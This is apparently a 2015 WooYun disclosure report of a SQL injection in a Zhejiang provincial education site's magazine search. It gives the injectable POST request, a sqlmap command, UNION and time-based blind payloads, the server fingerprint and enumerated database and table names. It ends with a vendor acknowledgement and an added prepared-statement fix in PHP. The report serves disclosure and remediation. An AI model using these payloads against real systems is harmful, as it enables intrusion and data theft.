Disclosure timeline:
2015-04-03: Details sent to the vendor, awaiting the vendor's handling
2015-04-03: Vendor confirmed; details visible only to the vendor
2015-04-13: Details disclosed to core white hats and domain experts
2015-04-23: Details disclosed to regular white hats
2015-05-03: Details disclosed to intern white hats
2015-05-18: Details disclosed to the public

SQL injection vulnerability in the Zhejiang Provincial Education Technology Center

The main site has an injection vulnerability:
POST /search_magazine_result.php HTTP/1.1
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.zjedu.org
Cookie: PHPSESSID=ajmr2957k7tv1qm7qcmico1ob2
Host: www.zjedu.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

s_author=*&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0%3f%3f%a8%ba%3f%a8%b2&s_key=e

Both s_author and s_key are injectable.

Save the request as 4.txt and test it with: sqlmap.py -r d:\4.txt --level 5 --risk 3. Detection results:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11

Databases can be disclosed:
available databases [5]:
[*] information_schema
[*] test
[*] zjjyjs

Table names can be disclosed:
Database: zjjyjs
[67 tables]
+------------------+
| area_group       |
| column_center    |
| column_center2   |
| djcolumn_center  |
| djinfo_center    |
| document_center  |
| document_receive |
| document_share   |
| fst_area_over    |
| fst_areadata     |
| fst_ds           |
| fst_ds_sb        |
| fst_sch          |
| fst_schdata      |
| fst_schdata_plan |
| fst_schdc_plan   |
| fst_tj_plan      |
| fst_xs           |
| fst_xx           |
| info_center      |
| info_center2     |
| log_center       |
| magazine_cate    |
| magazine_center  |
| magazine_deliver |
| magazine_stages  |
| meeting_center   |
| meeting_signup   |
| menu_option      |
| nycolumn_center  |
| nyinfo_center    |
| publish_center   |
| right_type       |
| tv_video_stat    |
| user_center      |
| user_group       |
+------------------+

Column names:

Filter the parameters.

Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-04-03 22:49
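As an added example of the "filter the parameters" fix (not code from the site or from this report), here is a version of the search handler that passes s_author, s_key and s_date to MySQL as bound parameters through mysqli prepared statements, which PHP 5.1.6 already supports. The connection details and the column names of the magazine_center table are assumptions.

```php
<?php
// Added example, not the site's own code: a hardened search handler.
// Connection credentials and the columns of magazine_center are assumed.
$mysqli = new mysqli('localhost', 'app_user', 'app_pass', 'zjjyjs');
if ($mysqli->connect_errno) {
    die('DB connection failed');
}

// Read the same POST fields the vulnerable request carries, with safe defaults.
$author = isset($_POST['s_author']) ? (string)$_POST['s_author'] : '';
$key    = isset($_POST['s_key'])    ? (string)$_POST['s_key']    : '';
$days   = isset($_POST['s_date'])   ? (int)$_POST['s_date']      : 365; // integer only

// Escape LIKE wildcards so a user-supplied "%" or "_" matches literally.
$authorPattern = '%' . addcslashes($author, '%_\\') . '%';
$keyPattern    = '%' . addcslashes($key, '%_\\') . '%';

// The statement text contains only placeholders; values travel separately,
// so a quote, UNION or SLEEP() inside s_author cannot alter the query.
$sql = 'SELECT id, title, author, pub_date FROM magazine_center '
     . 'WHERE author LIKE ? AND title LIKE ? '
     . 'AND pub_date >= DATE_SUB(CURDATE(), INTERVAL ? DAY) '
     . 'ORDER BY pub_date DESC LIMIT 50';
$stmt = $mysqli->prepare($sql);
if ($stmt === false) {
    die('Query preparation failed');
}
$stmt->bind_param('ssi', $authorPattern, $keyPattern, $days);
$stmt->execute();

// bind_result/fetch works without mysqlnd, which matters on a PHP 5.1 host.
$stmt->bind_result($id, $title, $resAuthor, $pubDate);
while ($stmt->fetch()) {
    // Output-encode on the way out so stored values cannot inject HTML either.
    echo htmlspecialchars($title, ENT_QUOTES, 'UTF-8'), ' (', (int)$id, ")\n";
}
$stmt->close();
$mysqli->close();
```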
Many thanks to @netwind and WooYun for their contribution to our information security; we will fix the vulnerability as soon as possible.

None yet